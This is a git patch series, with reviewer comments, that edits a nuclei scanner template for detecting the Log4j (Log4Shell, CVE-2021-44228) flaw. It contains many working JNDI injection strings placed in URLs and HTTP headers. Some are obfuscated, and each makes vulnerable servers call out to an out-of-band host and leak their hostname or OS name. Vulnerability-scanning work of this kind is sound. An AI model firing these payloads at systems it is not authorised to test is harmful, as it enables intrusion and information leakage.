From 08310d6a977f49d735e8bc522ff42ba10f72d179 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Thu, 20 Apr 2023 22:03:27 +0800
Subject: [PATCH 1/7] Update CVE-2021-44228.yaml

---
 cves/2021/CVE-2021-44228.yaml | 46 ++++++++++++++++-------------------
 1 file changed, 21 insertions(+), 25 deletions(-)

diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index dd1200ac1a..c1c2fa9936 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -23,31 +23,29 @@ info:
 requests:
   - raw:
       - |
-        GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
+        GET /solr/admin/cores?action=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1
         Host: {{Hostname}}
-
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
-        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
-        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
-        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
-        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
-        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
-        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
-        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
-        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
-        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
-        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
-        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
-        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
-        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
-        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
-        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
-        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
-        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
-
+        Accept: ${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
+        Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}}
+        Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}}
+        Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}}
+        Access-Control-Request-Method: ${jndi:ldap://${sys:os.name}.accesscontrolrequestmethod.{{interactsh-url}}}
+        Authentication: Basic ${jndi:ldap://${sys:os.name}.authenticationbasic.{{interactsh-url}}}
+        Authentication: Bearer ${jndi:ldap://${sys:os.name}.authenticationbearer.{{interactsh-url}}}
+        Cookie: ${jndi:ldap://${sys:os.name}.cookiename.{{interactsh-url}}}=${jndi:ldap://${sys:os.name}.cookievalue.{{interactsh-url}}}
+        Location: ${jndi:ldap://${sys:os.name}.location.{{interactsh-url}}}
+        Origin: ${jndi:ldap://${sys:os.name}.origin.{{interactsh-url}}}
+        Referer: ${jndi:ldap://${sys:os.name}.referer.{{interactsh-url}}}
+        Upgrade-Insecure-Requests: ${jndi:ldap://${sys:os.name}.upgradeinsecurerequests.{{interactsh-url}}}
+        User-Agent: ${jndi:ldap://${sys:os.name}.useragent.{{interactsh-url}}}
+        X-Api-Version: ${jndi:ldap://${sys:os.name}.xapiversion.{{interactsh-url}}}
+        X-CSRF-Token: ${jndi:ldap://${sys:os.name}.xcsrftoken.{{interactsh-url}}}
+        X-Druid-Comment: ${jndi:ldap://${sys:os.name}.xdruidcomment.{{interactsh-url}}}
+        X-Forwarded-For: ${jndi:ldap://${sys:os.name}.xforwardedfor.{{interactsh-url}}}
+        X-Origin: ${jndi:ldap://${sys:os.name}.xorigin.{{interactsh-url}}}
     stop-at-first-match: true
     matchers-condition: and
     matchers:
@@ -59,7 +57,7 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+          - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # windows or linux
 
     extractors:
       - type: kval
@@ -76,6 +74,4 @@ requests:
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
-
-# Enhanced by mp on 2022/02/28
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
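Review bot: The new matcher regex on the `regex:` line of the second hunk has an alternation-precedence slip: the trailing `\.` binds only to the linux branch, so the windows branch matches the bare word anywhere in the callback request, and the spelled-out `(W|w)(I|i)…` groups read more clearly as `'(?i)(windows|linux)\.'`. The larger concern is coverage: `${sys:os.name}` is the raw Java os.name value, so a host reporting something like `Mac OS X`, `FreeBSD` or `SunOS` never matches and the finding is silently lost, and a Windows value that presumably contains spaces cannot form a DNS label, so that lookup may never reach the interactsh server at all; keying the match on a marker that is always a single valid label (as the previous `${hostName}` was) is safer. The last hunk changes only the extractor's comment to `${sys:os.name}` while keeping the old four-label regex, so after this patch the matcher and the extractor no longer agree on what a valid callback looks like; the two should be updated together.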
From 8051b30eee5d6615856b39998ab2cf5a9cedb661 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Thu, 20 Apr 2023 22:06:54 +0800
Subject: [PATCH 2/7] update uri

---
 cves/2021/CVE-2021-44228.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index c1c2fa9936..4d05105b48 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -23,7 +23,7 @@ info:
 requests:
   - raw:
       - |
-        GET /solr/admin/cores?action=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1
+        GET /?x=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1
         Host: {{Hostname}}
       - |
         GET / HTTP/1.1

From 50f218f2e6256a06b2284cb2d4a3d64a565c90e4 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Thu, 20 Apr 2023 23:54:41 +0800
Subject: [PATCH 3/7] update Accept

---
 cves/2021/CVE-2021-44228.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index 4d05105b48..30cc932d07 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -28,7 +28,7 @@ requests:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Accept: ${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
+        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
         Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}}
         Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}}
         Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}}

From f7d012a580b7f09c26ff6841d45cf206a2c11ee3 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Mon, 24 Apr 2023 01:42:42 +0800
Subject: [PATCH 4/7] Update CVE-2021-44228.yaml

---
 cves/2021/CVE-2021-44228.yaml | 52 +++++++++++++++++++----------------
 1 file changed, 29 insertions(+), 23 deletions(-)

diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index 30cc932d07..54514290c2 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-44228
 
 info:
   name: Apache Log4j2 Remote Code Injection
-  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
+  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
   severity: critical
   description: |
     Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
@@ -20,32 +20,38 @@ info:
   cwe-id: CWE-502
   tags: cve,cve2021,rce,oast,log4j,injection,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 requests:
   - raw:
       - |
-        GET /?x=${jndi:ldap://${sys:os.name}.uri.{{interactsh-url}}/a} HTTP/1.1
+        GET /solr/admin/cores?action=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
         Host: {{Hostname}}
+
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
-        Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}}
-        Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}}
-        Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}}
-        Access-Control-Request-Method: ${jndi:ldap://${sys:os.name}.accesscontrolrequestmethod.{{interactsh-url}}}
-        Authentication: Basic ${jndi:ldap://${sys:os.name}.authenticationbasic.{{interactsh-url}}}
-        Authentication: Bearer ${jndi:ldap://${sys:os.name}.authenticationbearer.{{interactsh-url}}}
-        Cookie: ${jndi:ldap://${sys:os.name}.cookiename.{{interactsh-url}}}=${jndi:ldap://${sys:os.name}.cookievalue.{{interactsh-url}}}
-        Location: ${jndi:ldap://${sys:os.name}.location.{{interactsh-url}}}
-        Origin: ${jndi:ldap://${sys:os.name}.origin.{{interactsh-url}}}
-        Referer: ${jndi:ldap://${sys:os.name}.referer.{{interactsh-url}}}
-        Upgrade-Insecure-Requests: ${jndi:ldap://${sys:os.name}.upgradeinsecurerequests.{{interactsh-url}}}
-        User-Agent: ${jndi:ldap://${sys:os.name}.useragent.{{interactsh-url}}}
-        X-Api-Version: ${jndi:ldap://${sys:os.name}.xapiversion.{{interactsh-url}}}
-        X-CSRF-Token: ${jndi:ldap://${sys:os.name}.xcsrftoken.{{interactsh-url}}}
-        X-Druid-Comment: ${jndi:ldap://${sys:os.name}.xdruidcomment.{{interactsh-url}}}
-        X-Forwarded-For: ${jndi:ldap://${sys:os.name}.xforwardedfor.{{interactsh-url}}}
-        X-Origin: ${jndi:ldap://${sys:os.name}.xorigin.{{interactsh-url}}}
+        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
+        Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}
+        Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}
+        Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
+        Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
+        Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}
+        Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}
+        Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}
+        Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}
+        Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}
+        Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}
+        Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
+        User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}
+        X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
+        X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}
+        X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}
+        X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}
+        X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
@@ -57,7 +63,7 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # windows or linux
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
       - type: kval
@@ -68,10 +74,10 @@ requests:
         part: interactsh_request
         group: 2
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
 
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

From ff44b758128d478a3aa9fef7f0f28b5b250f3133 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Mon, 24 Apr 2023 01:43:03 +0800
Subject: [PATCH 5/7] Update CVE-2021-44228.yaml

---
 cves/2021/CVE-2021-44228.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index 54514290c2..1c49ba9ccc 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -27,7 +27,7 @@ variables:
 requests:
   - raw:
       - |
-        GET /solr/admin/cores?action=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
+        GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
         Host: {{Hostname}}
 
       - |
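Review bot: The new matcher regex `'\d{6}\.([a-zA-Z0-9\.\-]+)…'` accepts any six leading digits, so the per-run values produced by `rand1`/`rand2` in the previous hunk are embedded in every lookup but never checked on the way back; as written, the prefix appears to serve only to make each lookup distinct, and it does not tie the callback to this particular run. If nuclei substitutes template variables inside matcher regexes the way it does in the raw request (worth confirming against the version in use), `'{{rand1}}{{rand2}}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'` would pin the expected value while keeping the same capture groups. Either way the purpose of the six-digit prefix is not stated anywhere; a comment on the `variables:` block such as `# two 3-digit values are joined into a 6-digit per-run marker, matched by \d{6}\. below` would save the next maintainer from re-deriving it. The trailing `# Print extracted … in output` comment on this matcher line is copied from the extractors, but a matcher extracts nothing, so `# callback must carry the 6-digit marker followed by the hostName labels` would describe what the line actually enforces.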
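Review bot: The comment on the last added line, `# Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output`, overstates what the extractor emits: `group: 1` is the first parenthesised group, which begins after the unparenthesised `\d{6}\.` prefix, so only the `${hostName}` portion is reported and the six random digits are dropped. Either correct the comment to `# Print extracted ${hostName} in output`, or, if the digits are meant to be visible in the finding, pull them into the group with `'(\d{6}\.[a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`. The `group: 2` extractor earlier in the hunk is unaffected, since the added prefix contains no group and the numbering is unchanged.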
From 966d37b02ee7e78dc4f621e16f346393fa68c088 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 1 May 2023 09:07:12 +0530
Subject: [PATCH 7/7] updated template path and protocol name

---
 {cves => http/cves}/2021/CVE-2021-44228.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename {cves => http/cves}/2021/CVE-2021-44228.yaml (99%)

diff --git a/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml
similarity index 99%
rename from cves/2021/CVE-2021-44228.yaml
rename to http/cves/2021/CVE-2021-44228.yaml
index 1c49ba9ccc..2acc48aeb5 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/http/cves/2021/CVE-2021-44228.yaml
@@ -24,7 +24,7 @@ variables:
   rand1: '{{rand_int(111, 999)}}'
   rand2: '{{rand_int(111, 999)}}'
 
-requests:
+http:
   - raw:
       - |
         GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1